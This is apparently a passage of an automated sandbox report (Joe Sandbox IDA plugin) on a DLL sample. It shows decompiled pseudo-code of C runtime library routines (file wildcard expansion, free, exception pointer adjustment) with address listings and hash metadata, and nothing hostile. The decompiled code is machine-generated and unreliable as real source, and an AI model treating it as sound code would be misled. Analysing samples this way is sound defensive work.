					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E6E9ECC22(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E6E9F2161(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E6E9EC27C();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E6E9EDC48(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E6E9F2161(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E6E9EF185(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E6E9EDC0E(_t300);
														_t302 = _v12;
													}
													E6E9EDC0E(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E6E9F2161(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E6E9EC27C();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x6e9fc024; // 0xd7674204
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E6E9F21B0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E6E9EEB7E(_t244 - _t287 + 1, _t287,  &_v676, E6E9EF092(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E6E9EEAAF( &(_v608.cFileName),  &_v640,  &_v609, E6E9EF092(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E6E9EDC0E(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E6E9EDC0E(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E6E9F1BC0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E6E9EE9E5);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E6E9EDC0E(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E6E9E9ADF(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E6E9EDC0E(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E6E9F2170(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E6E9EDC0E( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E6E9EDC0E(_t283);
						goto L31;
					}
				} else {
					_t219 = E6E9ED46D(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E6E9EC24F();
					L31:
					return _t297;
				}
				L81:
			}

0x6e9eeba0
0x6e9eeba3
0x6e9eeba6
0x6e9eeba7
0x6e9eeba9
0x6e9eebbf
0x6e9eebc3
0x6e9eebc6
0x6e9eebc8
0x6e9eebca
0x6e9eebcc
0x6e9eebce
0x6e9eebd1
0x6e9eebd4
0x6e9eebd7
0x6e9eebd9
0x6e9eec3c
0x6e9eec3e
0x6e9eec41
0x6e9eec43
0x6e9eec47
0x6e9eec50
0x6e9eec51
0x6e9eec54
0x6e9eec56
0x6e9eec59
0x6e9eec5d
0x6e9eec5d
0x6e9eec5f
0x6e9eec61
0x6e9eec63
0x6e9eec65
0x6e9eec65
0x6e9eec67
0x6e9eec6a
0x6e9eec6d
0x6e9eec6d
0x6e9eec6f
0x6e9eec70
0x6e9eec70
0x6e9eec7b
0x6e9eec7d
0x6e9eec80
0x6e9eec81
0x6e9eec84
0x6e9eec84
0x6e9eec88
0x6e9eec8b
0x6e9eec8e
0x6e9eec8e
0x6e9eec8e
0x6e9eec9b
0x6e9eec9d
0x6e9eeca0
0x6e9eeca2
0x6e9eecba
0x6e9eecbd
0x6e9eecc0
0x6e9eecc2
0x6e9eecc5
0x6e9eecc7
0x6e9eecca
0x6e9eeccd
0x6e9eed2a
0x6e9eed2d
0x6e9eed30
0x6e9eed32
0x00000000
0x6e9eeccf
0x6e9eecd1
0x6e9eecd1
0x6e9eecd3
0x6e9eecd6
0x6e9eecd6
0x6e9eecd8
0x6e9eecda
0x6e9eece0
0x6e9eece3
0x6e9eece3
0x6e9eece5
0x6e9eece6
0x6e9eece6
0x6e9eeced
0x6e9eecf0
0x6e9eecf4
0x6e9eed01
0x6e9eed06
0x6e9eed09
0x6e9eed0b
0x6e9eed7f
0x6e9eed80
0x6e9eed81
0x6e9eed82
0x6e9eed83
0x6e9eed84
0x6e9eed89
0x6e9eed8d
0x6e9eed8f
0x6e9eed90
0x6e9eed93
0x6e9eed93
0x6e9eed96
0x6e9eed96
0x6e9eed98
0x6e9eed99
0x6e9eed99
0x6e9eed9d
0x6e9eed9e
0x6e9eeda5
0x6e9eeda8
0x6e9eedab
0x6e9eedad
0x6e9eedb5
0x6e9eedb6
0x6e9eedb7
0x6e9eedba
0x6e9eedc4
0x6e9eedc8
0x6e9eedca
0x6e9eedde
0x6e9eedde
0x6e9eede1
0x6e9eedeb
0x6e9eedf0
0x6e9eedf3
0x6e9eedf5
0x00000000
0x6e9eedf7
0x6e9eedf7
0x6e9eedfc
0x6e9eee03
0x6e9eee06
0x6e9eee08
0x6e9eee19
0x6e9eee1b
0x6e9eee1d
0x6e9eee1d
0x6e9eee1d
0x6e9eee0a
0x6e9eee0b
0x6e9eee10
0x6e9eee13
0x6e9eee22
0x6e9eee28
0x00000000
0x6e9eee2b
0x6e9eedcc
0x6e9eedcc
0x6e9eedd2
0x6e9eedd7
0x6e9eedda
0x6e9eeddc
0x6e9eee2e
0x6e9eee30
0x6e9eee31
0x6e9eee32
0x6e9eee33
0x6e9eee34
0x6e9eee35
0x6e9eee3a
0x6e9eee3d
0x6e9eee3e
0x6e9eee40
0x6e9eee46
0x6e9eee4d
0x6e9eee50
0x6e9eee53
0x6e9eee56
0x6e9eee57
0x6e9eee58
0x6e9eee5b
0x6e9eee61
0x6e9eee63
0x6e9eee65
0x6e9eee65
0x6e9eee67
0x6e9eee69
0x00000000
0x00000000
0x6e9eee6b
0x6e9eee6d
0x6e9eee6f
0x6e9eee71
0x6e9eee7c
0x6e9eee7e
0x6e9eee80
0x00000000
0x00000000
0x6e9eee80
0x6e9eee71
0x00000000
0x6e9eee6d
0x6e9eee82
0x6e9eee82
0x6e9eee88
0x6e9eee8a
0x6e9eee90
0x6e9eee92
0x6e9eeeb4
0x6e9eeeb4
0x6e9eeeb6
0x6e9eeeb8
0x6e9eeec4
0x6e9eeec4
0x6e9eeeba
0x6e9eeeba
0x6e9eeebc
0x00000000
0x6e9eeebe
0x6e9eeebe
0x6e9eeec0
0x6e9eeec2
0x00000000
0x00000000
0x6e9eeec2
0x6e9eeebc
0x6e9eeecc
0x6e9eeed4
0x6e9eeeda
0x6e9eeedb
0x6e9eeedd
0x6e9eeee5
0x6e9eeeeb
0x6e9eeef1
0x6e9eeef7
0x6e9eef0b
0x6e9eef10
0x6e9eef1b
0x6e9eef2b
0x6e9eef31
0x6e9eef33
0x6e9eef36
0x6e9eef59
0x6e9eef59
0x6e9eef5e
0x6e9eef64
0x6e9eef64
0x6e9eef6a
0x6e9eef70
0x6e9eef76
0x6e9eef7c
0x6e9eef82
0x6e9eefa3
0x6e9eefa8
0x6e9eefad
0x6e9eefb1
0x6e9eefb7
0x6e9eefba
0x6e9eefcd
0x6e9eefcd
0x6e9eefd3
0x6e9eefd9
0x6e9eefda
0x6e9eefdb
0x6e9eefe0
0x6e9eefe3
0x6e9eefe9
0x6e9eefeb
0x6e9ef049
0x6e9ef04f
0x6e9ef057
0x6e9ef05c
0x6e9ef062
0x6e9ef063
0x00000000
0x00000000
0x00000000
0x6e9eefbc
0x6e9eefbc
0x6e9eefbf
0x6e9eefc1
0x00000000
0x6e9eefc3
0x6e9eefc3
0x6e9eefc6
0x00000000
0x6e9eefc8
0x6e9eefc8
0x6e9eefcb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eefcb
0x6e9eefc6
0x6e9eefc1
0x6e9ef065
0x6e9ef066
0x00000000
0x6e9eefed
0x6e9eefed
0x6e9eeff3
0x6e9eeffb
0x6e9ef000
0x6e9ef00f
0x6e9ef00f
0x6e9ef017
0x6e9ef01d
0x6e9ef023
0x6e9ef02a
0x6e9ef02d
0x6e9ef02f
0x6e9ef03f
0x6e9ef044
0x00000000
0x6e9eef38
0x6e9eef38
0x6e9eef3e
0x6e9eef3f
0x6e9eef40
0x6e9eef41
0x6e9eef49
0x6e9eef49
0x6e9ef06c
0x6e9ef06c
0x6e9ef073
0x6e9ef074
0x6e9ef07c
0x6e9ef081
0x6e9ef082
0x6e9eee94
0x6e9eee94
0x6e9eee97
0x6e9eee99
0x6e9eeeae
0x00000000
0x6e9eee9b
0x6e9eee9b
0x6e9eee9e
0x6e9eee9f
0x6e9eeea0
0x6e9eeea1
0x6e9eeea6
0x6e9eee99
0x6e9ef087
0x6e9ef088
0x6e9ef08a
0x6e9ef091
0x00000000
0x00000000
0x00000000
0x6e9eeddc
0x6e9eedaf
0x6e9eedb1
0x6e9eedb2
0x6e9eedb4
0x6e9eedb4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9eed0d
0x6e9eed0d
0x6e9eed13
0x6e9eed16
0x6e9eed19
0x6e9eed1c
0x6e9eed1f
0x6e9eed22
0x6e9eed25
0x6e9eed25
0x00000000
0x6e9eecd6
0x6e9eeca4
0x6e9eeca4
0x6e9eeca7
0x6e9eed34
0x6e9eed35
0x6e9eed3a
0x00000000
0x6e9eed3a
0x6e9eebdb
0x6e9eebdb
0x6e9eebde
0x6e9eebe6
0x6e9eebe9
0x6e9eebf0
0x6e9eebf2
0x6e9eebf4
0x6e9eec0f
0x6e9eec10
0x6e9eec11
0x6e9eec12
0x6e9eec17
0x6e9eec1a
0x6e9eec1d
0x6e9eebf6
0x6e9eebf6
0x6e9eebf9
0x6e9eebfa
0x6e9eebfb
0x6e9eebfc
0x6e9eebfd
0x6e9eec02
0x6e9eec04
0x6e9eec07
0x6e9eec07
0x6e9eec1f
0x6e9eec21
0x00000000
0x00000000
0x6e9eec2a
0x6e9eec2d
0x6e9eec30
0x6e9eec32
0x6e9eec34
0x00000000
0x6e9eec36
0x6e9eec36
0x6e9eec39
0x00000000
0x6e9eec39
0x00000000
0x6e9eec34
0x6e9eecaf
0x6e9eed3b
0x6e9eed3e
0x6e9eed42
0x6e9eed4b
0x6e9eed4e
0x6e9eed52
0x6e9eed52
0x6e9eed54
0x6e9eed57
0x6e9eed59
0x6e9eed5b
0x6e9eed5d
0x6e9eed62
0x6e9eed63
0x6e9eed67
0x6e9eed67
0x6e9eed6b
0x6e9eed6e
0x6e9eed6e
0x6e9eed72
0x00000000
0x6e9eed79
0x6e9eebab
0x6e9eebab
0x6e9eebb2
0x6e9eebb3
0x6e9eebb5
0x6e9eed7a
0x6e9eed7e
0x6e9eed7e
0x00000000

APIs

_free.LIBCMT ref: 6E9EED35

Strings

*?, xrefs: 6E9EEBDE

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 1aa044b2e489118f0afdaa97e03eedc89370b5ab67caed0016f4f3b18f788326
Instruction ID: 281f2fa580f1972745f4398691731440407b0cee76191dfe4d0564099d8e448c
Opcode Fuzzy Hash: 1aa044b2e489118f0afdaa97e03eedc89370b5ab67caed0016f4f3b18f788326
Instruction Fuzzy Hash: 98615975E002199FDB16CFA8C8819EEBBF9EF88314B14856AD915E7704E731EE418F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EAE74 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E6E9EAE74(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6e9fa770);
				E6E9E9960(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6E9E9DB0(_t107, E6E9EAC5A(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6E9E9DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6e9fd368; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6e9f51b8();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6E9ED547(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6e9fa790);
									E6E9E9960(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6E9EAE74(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6E9EBB74(_t103, _t108[0x18], E6E9EAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6E9EBB84(_t103, _t108[0x18], E6E9EAC5A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6E9EAC5A();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6e9eae74
0x6e9eae76
0x6e9eae7b
0x6e9eae80
0x6e9eae82
0x6e9eae85
0x6e9eae8a
0x6e9eaf9a
0x6e9eaf9a
0x6e9eaf9a
0x00000000
0x6e9eae99
0x6e9eae99
0x6e9eae9e
0x6e9eaea8
0x6e9eaeaa
0x6e9eaeaf
0x6e9eaeb4
0x6e9eaeb4
0x6e9eaeb6
0x6e9eaeb9
0x6e9eaebe
0x6e9eaee0
0x6e9eaee0
0x6e9eaee3
0x6e9eaee6
0x6e9eaf04
0x6e9eaf07
0x6e9eaf46
0x6e9eaf49
0x6e9eaf4c
0x6e9eaf71
0x6e9eaf73
0x00000000
0x6e9eaf75
0x6e9eaf75
0x6e9eaf77
0x00000000
0x6e9eaf79
0x6e9eaf79
0x6e9eaf7e
0x6e9eaf82
0x6e9eaf82
0x6e9eaf83
0x00000000
0x6e9eaf83
0x6e9eaf77
0x6e9eaf4e
0x6e9eaf4e
0x6e9eaf50
0x00000000
0x6e9eaf52
0x6e9eaf52
0x6e9eaf54
0x00000000
0x6e9eaf56
0x6e9eaf67
0x00000000
0x6e9eaf6c
0x6e9eaf54
0x6e9eaf50
0x6e9eaf09
0x6e9eaf09
0x6e9eaf0d
0x00000000
0x6e9eaf13
0x6e9eaf13
0x6e9eaf15
0x00000000
0x6e9eaf1b
0x6e9eaf22
0x6e9eaf2a
0x6e9eaf2e
0x6e9eaf30
0x6e9eaf33
0x6e9eaf38
0x6e9eaf39
0x00000000
0x6e9eaf39
0x6e9eaf33
0x00000000
0x6e9eaf2e
0x6e9eaf15
0x6e9eaf0d
0x6e9eaee8
0x6e9eaee8
0x00000000
0x6e9eaee8
0x6e9eaec5
0x6e9eaec5
0x6e9eaeca
0x6e9eaecf
0x00000000
0x6e9eaed1
0x6e9eaed3
0x6e9eaedc
0x6e9eaeeb
0x6e9eaeed
0x6e9eafac
0x6e9eafac
0x6e9eafb1
0x6e9eafb2
0x6e9eafb4
0x6e9eafb9
0x6e9eafbe
0x6e9eafc1
0x6e9eafc4
0x6e9eafc7
0x6e9eafd0
0x6e9eafd0
0x6e9eafc9
0x6e9eafc9
0x6e9eafc9
0x6e9eafd3
0x6e9eafd7
0x6e9eafda
0x6e9eafdb
0x6e9eafdc
0x6e9eafdd
0x6e9eafe0
0x6e9eafe9
0x6e9eafe9
0x6e9eafec
0x6e9eb022
0x6e9eafee
0x6e9eafee
0x6e9eafee
0x6e9eaff1
0x6e9eb008
0x6e9eb008
0x6e9eaff1
0x6e9eb027
0x6e9eb031
0x6e9eb03d
0x6e9eaefb
0x6e9eaefb
0x6e9eaf00
0x6e9eaf01
0x6e9eaf3b
0x6e9eaf42
0x6e9eaf86
0x6e9eaf86
0x6e9eaf8d
0x6e9eaf9c
0x6e9eaf9f
0x6e9eafab
0x6e9eafab
0x6e9eaeed
0x6e9eaecf
0x00000000
0x00000000
0x00000000
0x6e9eae9e

APIs

___AdjustPointer.LIBCMT ref: 6E9EAF3B
___AdjustPointer.LIBCMT ref: 6E9EAF5E
___AdjustPointer.LIBCMT ref: 6E9EAFFA

Memory Dump Source

Source File: 00000000.00000002.665771281.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000000.00000002.665760626.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665810652.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.665859318.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e9e0000_loaddll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: fdb29b57b3eebda42ff5a1f680b83c5908f8a26f0dc6d3bfbb2942a60244843a
Instruction ID: bdfd3962fb167fecf520b6702de0c2b4326775ae55bffdb29cdd9afb1e489efe
Opcode Fuzzy Hash: fdb29b57b3eebda42ff5a1f680b83c5908f8a26f0dc6d3bfbb2942a60244843a
Instruction Fuzzy Hash: B151D2B2504706AFDB1B8FD1D850BAA77B8EF44314F104A2DEA1547AA4E7B1E881CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EEAAF Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9EEAAF(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E6E9EFCA5(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
